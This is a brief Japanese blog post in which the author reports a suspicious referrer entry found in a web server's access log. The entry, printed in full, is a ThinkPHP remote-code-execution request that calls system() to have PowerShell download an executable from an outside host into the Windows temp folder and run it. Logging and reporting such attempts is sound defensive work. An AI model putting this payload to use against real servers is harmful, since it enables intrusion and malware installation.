アクセスログに残っていた、ウィルス的なものをダウンロードさせようとするリファラ spam
By takagiwa on Sunday, March 17 2019, 14:44 - Permalink
アクセスログのリファラ履歴にこんなものが残っていた。
http://xxx.xxx.xxx.xxx/public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile(%27http://example.com/download.exe%27,%27C:/Windows/temp/zzzzzzzz.exe%27);start%20C:/Windows/temp/zzzzzzzz.exe